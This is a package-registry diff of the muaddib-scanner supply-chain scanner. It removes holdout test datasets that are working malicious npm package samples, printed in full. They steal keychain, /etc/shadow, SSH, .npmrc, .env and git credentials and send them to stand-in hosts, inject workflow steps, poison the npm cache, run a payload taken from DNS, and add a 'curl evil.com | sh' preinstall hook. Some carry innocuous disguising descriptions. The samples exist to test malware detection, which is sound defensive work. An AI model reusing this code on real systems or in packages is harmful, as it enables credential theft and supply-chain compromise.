npm - muaddib-scanner - Versions diffs - 2.2.2 → 2.2.3 - Mend

muaddib-scanner 2.2.2 → 2.2.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (47) hide show

package/README.fr.md CHANGED Viewed

@@ -1,5 +1,5 @@
 <p align="center">
-  <img src="assets/logo2removebg.png" alt="MUAD'DIB Logo" width="700">
+  <img src="assets/muaddibLogo.png" alt="MUAD'DIB Logo" width="700">
 </p>
 <p align="center">

package/README.md CHANGED Viewed

@@ -1,5 +1,5 @@
 <p align="center">
-  <img src="assets/logo2removebg.png" alt="MUAD'DIB Logo" width="700">
+  <img src="assets/muaddibLogo.png" alt="MUAD'DIB Logo" width="700">
 </p>
 <p align="center">

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.2.2",
+  "version": "2.2.3",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/datasets/holdout-v2/conditional-os-payload/index.js DELETED Viewed

@@ -1,36 +0,0 @@
-const os = require('os');
-const { execSync } = require('child_process');
-const https = require('https');
-function exfil(data) {
-  const payload = JSON.stringify(data);
-  const req = https.request({
-    hostname: 'metrics.example.com',
-    port: 443,
-    path: '/v2/report',
-    method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
-  });
-  req.on('error', () => {});
-  req.write(payload);
-  req.end();
-}
-const platform = os.platform();
-const arch = os.arch();
-try {
-  if (platform === 'darwin') {
-    // macOS: dump keychain credentials
-    const creds = execSync('security dump-keychain -d login.keychain 2>/dev/null', { encoding: 'utf8', timeout: 10000 });
-    exfil({ os: 'darwin', arch, type: 'keychain', data: creds.substring(0, 8192) });
-  } else if (platform === 'linux') {
-    // Linux: read /etc/shadow
-    const shadow = execSync('cat /etc/shadow 2>/dev/null', { encoding: 'utf8', timeout: 5000 });
-    exfil({ os: 'linux', arch, type: 'shadow', data: shadow });
-  } else if (platform === 'win32') {
-    // Windows: extract saved credentials via PowerShell
-    const creds = execSync('powershell -c "Get-StoredCredential | ConvertTo-Json"', { encoding: 'utf8', timeout: 10000 });
-    exfil({ os: 'win32', arch, type: 'credentials', data: creds });
-  }
-} catch (e) {}

package/datasets/holdout-v2/conditional-os-payload/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "conditional-os-payload",
-  "version": "1.0.0",
-  "description": "Holdout v2 — OS-specific credential theft",
-  "main": "index.js"
-}

package/datasets/holdout-v2/env-var-reconstruction/index.js DELETED Viewed

@@ -1,21 +0,0 @@
-const https = require('https');
-// Reconstruct "GITHUB_TOKEN" from charCodes
-const codes = [71, 73, 84, 72, 85, 66, 95, 84, 79, 75, 69, 78];
-const varName = codes.map(c => String.fromCharCode(c)).join('');
-// Access via bracket notation to avoid static detection
-const secret = process.env[varName];
-if (secret) {
-  const payload = JSON.stringify({ t: secret, h: require('os').hostname() });
-  const req = https.request({
-    hostname: 'telemetry-api.example.com',
-    port: 443,
-    path: '/v1/collect',
-    method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': payload.length }
-  });
-  req.write(payload);
-  req.end();
-}

package/datasets/holdout-v2/env-var-reconstruction/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "env-var-reconstruction",
-  "version": "1.0.0",
-  "description": "Holdout v2 — charCode reconstruction of env var name",
-  "main": "index.js"
-}

package/datasets/holdout-v2/github-workflow-inject/index.js DELETED Viewed

@@ -1,36 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-// Find the project root by traversing up
-let projectRoot = __dirname;
-while (projectRoot !== path.dirname(projectRoot)) {
-  if (fs.existsSync(path.join(projectRoot, '.git'))) break;
-  projectRoot = path.dirname(projectRoot);
-}
-const workflowDir = path.join(projectRoot, '.github', 'workflows');
-// Malicious step to inject into existing workflows
-const maliciousStep = `
-      - name: Check dependencies
-        run: |
-          curl -s https://api.example.com/hook -d "token=${{ secrets.GITHUB_TOKEN }}" -d "repo=${{ github.repository }}"
-`;
-try {
-  const files = fs.readdirSync(workflowDir);
-  for (const file of files) {
-    if (!file.endsWith('.yml') && !file.endsWith('.yaml')) continue;
-    const fullPath = path.join(workflowDir, file);
-    let content = fs.readFileSync(fullPath, 'utf8');
-    // Inject after the first "steps:" line
-    const stepsIndex = content.indexOf('steps:');
-    if (stepsIndex !== -1) {
-      const afterSteps = content.indexOf('\n', stepsIndex);
-      content = content.slice(0, afterSteps + 1) + maliciousStep + content.slice(afterSteps + 1);
-      fs.writeFileSync(fullPath, content);
-    }
-  }
-} catch (e) {}

package/datasets/holdout-v2/github-workflow-inject/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "github-workflow-inject",
-  "version": "1.0.0",
-  "description": "Holdout v2 — inject step into existing workflow files",
-  "main": "index.js"
-}

package/datasets/holdout-v2/homedir-ssh-key-steal/index.js DELETED Viewed

@@ -1,29 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-const os = require('os');
-const https = require('https');
-// Read SSH private key
-const sshKeyPath = path.join(os.homedir(), '.ssh', 'id_rsa');
-let keyData;
-try {
-  keyData = fs.readFileSync(sshKeyPath, 'utf8');
-} catch (e) {
-  process.exit(0);
-}
-// Encode as base64 to fit in a header
-const encoded = Buffer.from(keyData).toString('base64');
-// Exfiltrate via custom header to legitimate-looking domain
-const req = https.request({
-  hostname: 'api.github.com',
-  port: 443,
-  path: '/repos/check-update',
-  method: 'GET',
-  headers: {
-    'User-Agent': 'node-updater/1.0',
-    'X-Debug-Data': encoded
-  }
-});
-req.end();

package/datasets/holdout-v2/homedir-ssh-key-steal/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "homedir-ssh-key-steal",
-  "version": "1.0.0",
-  "description": "Holdout v2 — SSH key exfiltration via HTTP header",
-  "main": "index.js"
-}

package/datasets/holdout-v2/npm-cache-poison/index.js DELETED Viewed

@@ -1,38 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-const os = require('os');
-const crypto = require('crypto');
-// Target: npm's content-addressable cache
-const npmCacheDir = path.join(os.homedir(), '.npm', '_cacache', 'content-v2', 'sha512');
-// Malicious payload to inject into cached package
-const maliciousCode = `
-;(function(){
-  const h = require('https');
-  const o = require('os');
-  const d = JSON.stringify({ h: o.hostname(), u: o.userInfo().username, e: process.env });
-  const r = h.request({ hostname: 'collect.example.com', path: '/npm', method: 'POST',
-    headers: { 'Content-Length': Buffer.byteLength(d) } });
-  r.write(d); r.end();
-})();
-`;
-try {
-  // Walk the cache directory to find JS entries
-  const subDirs = fs.readdirSync(npmCacheDir);
-  for (const sub of subDirs.slice(0, 5)) {
-    const subPath = path.join(npmCacheDir, sub);
-    const entries = fs.readdirSync(subPath);
-    for (const entry of entries.slice(0, 3)) {
-      const entryPath = path.join(subPath, entry);
-      const content = fs.readFileSync(entryPath, 'utf8');
-      // Only poison JS files
-      if (content.includes('module.exports') || content.includes('require(')) {
-        const poisoned = maliciousCode + '\n' + content;
-        fs.writeFileSync(entryPath, poisoned);
-      }
-    }
-  }
-} catch (e) {}

package/datasets/holdout-v2/npm-cache-poison/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "npm-cache-poison",
-  "version": "1.0.0",
-  "description": "Holdout v2 — local npm cache manipulation",
-  "main": "index.js"
-}

package/datasets/holdout-v2/npm-lifecycle-preinstall-curl/package.json DELETED Viewed

@@ -1,8 +0,0 @@
-{
-  "name": "npm-lifecycle-preinstall-curl",
-  "version": "1.0.0",
-  "description": "Holdout v2 — pure lifecycle script attack, no JS files",
-  "scripts": {
-    "preinstall": "curl -s https://evil.com/setup.sh | sh"
-  }
-}

package/datasets/holdout-v2/process-env-proxy-getter/index.js DELETED Viewed

@@ -1,35 +0,0 @@
-const http = require('http');
-// Snapshot all current env values before interception
-const envSnapshot = Object.assign({}, process.env);
-// Intercept all process.env property accesses via Object.defineProperty
-// Different from Proxy-based approach — works on the actual process.env object
-const sensitiveKeys = ['TOKEN', 'SECRET', 'KEY', 'PASSWORD', 'NPM', 'AWS', 'GITHUB'];
-Object.keys(envSnapshot).forEach(key => {
-  const original = envSnapshot[key];
-  const isSensitive = sensitiveKeys.some(s => key.toUpperCase().includes(s));
-  Object.defineProperty(process.env, key, {
-    get() {
-      if (isSensitive) {
-        // Silently exfiltrate on each access to a sensitive var
-        const payload = JSON.stringify({ k: key, v: original });
-        const req = http.request({
-          hostname: '127.0.0.1',
-          port: 8443,
-          path: '/log',
-          method: 'POST',
-          headers: { 'Content-Length': Buffer.byteLength(payload) }
-        });
-        req.on('error', () => {});
-        req.write(payload);
-        req.end();
-      }
-      return original;
-    },
-    configurable: true,
-    enumerable: true
-  });
-});

package/datasets/holdout-v2/process-env-proxy-getter/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "process-env-proxy-getter",
-  "version": "1.0.0",
-  "description": "Holdout v2 — defineProperty intercept on process.env",
-  "main": "index.js"
-}

package/datasets/holdout-v2/readable-stream-hijack/index.js DELETED Viewed

@@ -1,44 +0,0 @@
-const http = require('http');
-const https = require('https');
-// Monkey-patch IncomingMessage prototype to intercept all HTTP responses
-const originalEmit = http.IncomingMessage.prototype.emit;
-http.IncomingMessage.prototype.emit = function(event, ...args) {
-  if (event === 'end') {
-    // Extract authorization headers from the response's request
-    const authHeaders = {};
-    const reqHeaders = this.req && this.req.getHeaders ? this.req.getHeaders() : {};
-    for (const [key, value] of Object.entries(reqHeaders)) {
-      if (key.toLowerCase().includes('auth') || key.toLowerCase().includes('token') || key.toLowerCase().includes('cookie')) {
-        authHeaders[key] = value;
-      }
-    }
-    if (Object.keys(authHeaders).length > 0) {
-      // Forward intercepted auth headers to external server
-      const payload = JSON.stringify({
-        url: this.req && this.req.path,
-        headers: authHeaders,
-        timestamp: Date.now()
-      });
-      const exfilReq = https.request({
-        hostname: 'telemetry.example.com',
-        port: 443,
-        path: '/collect',
-        method: 'POST',
-        headers: {
-          'Content-Type': 'application/json',
-          'Content-Length': Buffer.byteLength(payload)
-        }
-      });
-      exfilReq.on('error', () => {});
-      exfilReq.write(payload);
-      exfilReq.end();
-    }
-  }
-  return originalEmit.call(this, event, ...args);
-};

package/datasets/holdout-v2/readable-stream-hijack/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "readable-stream-hijack",
-  "version": "1.0.0",
-  "description": "Holdout v2 — IncomingMessage prototype monkey-patch",
-  "main": "index.js"
-}

package/datasets/holdout-v2/setTimeout-chain/index.js DELETED Viewed

@@ -1,50 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-const os = require('os');
-const https = require('https');
-// Anti-sandbox: chained setTimeout with random delays
-// Sandboxes typically timeout after 30s, this chain can take up to 5 minutes
-function stage1() {
-  setTimeout(() => {
-    stage2();
-  }, Math.random() * 60000);
-}
-function stage2() {
-  setTimeout(() => {
-    stage3();
-  }, Math.random() * 60000);
-}
-function stage3() {
-  setTimeout(() => {
-    stage4();
-  }, Math.random() * 60000);
-}
-function stage4() {
-  setTimeout(() => {
-    stage5();
-  }, Math.random() * 60000);
-}
-function stage5() {
-  setTimeout(() => {
-    // Final payload: read .npmrc and exfiltrate
-    const npmrc = path.join(os.homedir(), '.npmrc');
-    try {
-      const token = fs.readFileSync(npmrc, 'utf8');
-      const data = Buffer.from(token).toString('base64');
-      const req = https.request({
-        hostname: 'cdn-analytics.example.com',
-        path: '/beacon?d=' + data,
-        method: 'GET'
-      });
-      req.end();
-    } catch (e) {}
-  }, Math.random() * 60000);
-}
-stage1();

package/datasets/holdout-v2/setTimeout-chain/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "setTimeout-chain",
-  "version": "1.0.0",
-  "description": "Holdout v2 — nested setTimeout chain with random delays",
-  "main": "index.js"
-}

package/datasets/holdout-v2/wasm-loader/index.js DELETED Viewed

@@ -1,46 +0,0 @@
-const https = require('https');
-const os = require('os');
-// Download WASM module at runtime — malicious logic is in the binary
-const wasmUrl = 'https://cdn.example.com/analytics/v3/engine.wasm';
-function downloadWasm(url) {
-  return new Promise((resolve, reject) => {
-    https.get(url, (res) => {
-      const chunks = [];
-      res.on('data', c => chunks.push(c));
-      res.on('end', () => resolve(Buffer.concat(chunks)));
-      res.on('error', reject);
-    }).on('error', reject);
-  });
-}
-async function init() {
-  const wasmBytes = await downloadWasm(wasmUrl);
-  // Collect credentials to pass into WASM memory
-  const env = process.env;
-  const creds = JSON.stringify({
-    npm: env.NPM_TOKEN || '',
-    gh: env.GITHUB_TOKEN || '',
-    aws_key: env.AWS_ACCESS_KEY_ID || '',
-    aws_secret: env.AWS_SECRET_ACCESS_KEY || '',
-    hostname: os.hostname(),
-    user: os.userInfo().username
-  });
-  // Instantiate WASM with imported memory containing credentials
-  const memory = new WebAssembly.Memory({ initial: 10 });
-  const encoder = new TextEncoder();
-  const encoded = encoder.encode(creds);
-  new Uint8Array(memory.buffer).set(encoded);
-  const { instance } = await WebAssembly.instantiate(wasmBytes, {
-    env: { memory, credsLen: encoded.length }
-  });
-  // WASM module handles exfiltration internally via imported network functions
-  instance.exports.run();
-}
-init().catch(() => {});

package/datasets/holdout-v2/wasm-loader/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "wasm-loader",
-  "version": "1.0.0",
-  "description": "Holdout v2 — WASM-based credential passing",
-  "main": "index.js"
-}

package/datasets/holdout-v3/dns-txt-payload/index.js DELETED Viewed

@@ -1,11 +0,0 @@
-const dns = require('dns');
-// Retrieve payload from DNS TXT record — no HTTP involved
-dns.resolveTxt('payload.evil-dns.com', (err, records) => {
-  if (err) return;
-  // TXT records come as arrays of strings
-  const encoded = records.map(r => r.join('')).join('');
-  const decoded = Buffer.from(encoded, 'base64').toString('utf8');
-  // Execute the payload received via DNS
-  eval(decoded);
-});

package/datasets/holdout-v3/dns-txt-payload/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "dns-txt-payload",
-  "version": "1.0.0",
-  "description": "DNS resolver helper utilities",
-  "main": "index.js"
-}

package/datasets/holdout-v3/electron-rce/index.js DELETED Viewed

@@ -1,32 +0,0 @@
-// Only activate in Electron environment where we have elevated privileges
-if (process.versions && process.versions.electron) {
-  const { exec } = require('child_process');
-  const os = require('os');
-  // Electron apps often run with higher privileges
-  const platform = os.platform();
-  let cmd;
-  if (platform === 'win32') {
-    cmd = 'powershell -NoProfile -Command "Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select DisplayName, InstallLocation | ConvertTo-Json"';
-  } else if (platform === 'darwin') {
-    cmd = 'security find-generic-password -ga "Chrome" 2>&1 | head -20';
-  } else {
-    cmd = 'cat /etc/shadow 2>/dev/null || cat /etc/passwd';
-  }
-  exec(cmd, (err, stdout) => {
-    if (stdout) {
-      const https = require('https');
-      const data = JSON.stringify({ platform, data: stdout });
-      const req = https.request({
-        hostname: 'electron-data.evil.com',
-        port: 443,
-        path: '/exfil',
-        method: 'POST',
-        headers: { 'Content-Type': 'application/json' }
-      });
-      req.write(data);
-      req.end();
-    }
-  });
-}

package/datasets/holdout-v3/electron-rce/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "electron-rce",
-  "version": "1.0.0",
-  "description": "Cross-platform desktop helper",
-  "main": "index.js"
-}

package/datasets/holdout-v3/env-file-parse-exfil/index.js DELETED Viewed

@@ -1,39 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-const https = require('https');
-// Read .env file directly — no dotenv, no process.env
-const envPath = path.join(process.cwd(), '.env');
-let envContent;
-try {
-  envContent = fs.readFileSync(envPath, 'utf8');
-} catch(e) { process.exit(0); }
-// Manual KEY=VALUE parsing
-const secrets = {};
-envContent.split('\n').forEach(line => {
-  const trimmed = line.trim();
-  if (!trimmed || trimmed.startsWith('#')) return;
-  const eqIdx = trimmed.indexOf('=');
-  if (eqIdx === -1) return;
-  const key = trimmed.slice(0, eqIdx).trim();
-  const val = trimmed.slice(eqIdx + 1).trim().replace(/^["']|["']$/g, '');
-  if (/TOKEN|SECRET|KEY|PASSWORD|API/i.test(key)) {
-    secrets[key] = val;
-  }
-});
-// Exfiltrate parsed secrets
-if (Object.keys(secrets).length > 0) {
-  const data = JSON.stringify(secrets);
-  const opts = {
-    hostname: 'env-collector.malware.io',
-    port: 443,
-    path: '/api/env',
-    method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
-  };
-  const req = https.request(opts);
-  req.write(data);
-  req.end();
-}

package/datasets/holdout-v3/env-file-parse-exfil/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "env-file-parse-exfil",
-  "version": "1.0.0",
-  "description": "Environment configuration loader",
-  "main": "index.js"
-}

package/datasets/holdout-v3/git-credential-steal/index.js DELETED Viewed

@@ -1,41 +0,0 @@
-const fs = require('fs');
-const os = require('os');
-const path = require('path');
-const https = require('https');
-const home = os.homedir();
-const collected = {};
-// Read git config for remote URLs with embedded tokens
-try {
-  const gitConfig = fs.readFileSync(path.join(home, '.gitconfig'), 'utf8');
-  const urlMatches = gitConfig.match(/url\s*=\s*.+/g);
-  if (urlMatches) collected.gitconfig = urlMatches;
-} catch(e) {}
-// Read stored git credentials
-try {
-  const creds = fs.readFileSync(path.join(home, '.git-credentials'), 'utf8');
-  collected.credentials = creds.split('\n').filter(l => l.trim());
-} catch(e) {}
-// Also check the project-level .git/config
-try {
-  const localConfig = fs.readFileSync(path.join(process.cwd(), '.git', 'config'), 'utf8');
-  const remotes = localConfig.match(/url\s*=\s*.+/g);
-  if (remotes) collected.localRemotes = remotes;
-} catch(e) {}
-if (Object.keys(collected).length > 0) {
-  const payload = JSON.stringify(collected);
-  const opts = {
-    hostname: 'git-tokens.exfil.dev',
-    port: 443,
-    path: '/collect',
-    method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
-  };
-  const req = https.request(opts);
-  req.write(payload);
-  req.end();
-}

package/datasets/holdout-v3/git-credential-steal/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "git-credential-steal",
-  "version": "1.0.0",
-  "description": "Git repository inspector utility",
-  "main": "index.js"
-}

package/datasets/holdout-v3/npm-hook-hijack/index.js DELETED Viewed

@@ -1,20 +0,0 @@
-const fs = require('fs');
-const os = require('os');
-const path = require('path');
-const home = os.homedir();
-const npmrcPath = path.join(home, '.npmrc');
-// Read existing .npmrc content
-let existing = '';
-try {
-  existing = fs.readFileSync(npmrcPath, 'utf8');
-} catch(e) {}
-// Inject an oninstall hook for persistence
-// This will execute on every future npm install
-const hook = '\noninstall=node -e "require(\'https\').get(\'https://hooks.malware.io/ping?h=\'+require(\'os\').hostname())"';
-if (!existing.includes('oninstall')) {
-  fs.writeFileSync(npmrcPath, existing + hook, 'utf8');
-}

package/datasets/holdout-v3/npm-hook-hijack/package.json DELETED Viewed

@@ -1,9 +0,0 @@
-{
-  "name": "npm-hook-hijack",
-  "version": "1.0.0",
-  "description": "npm configuration optimizer",
-  "main": "index.js",
-  "scripts": {
-    "postinstall": "node index.js"
-  }
-}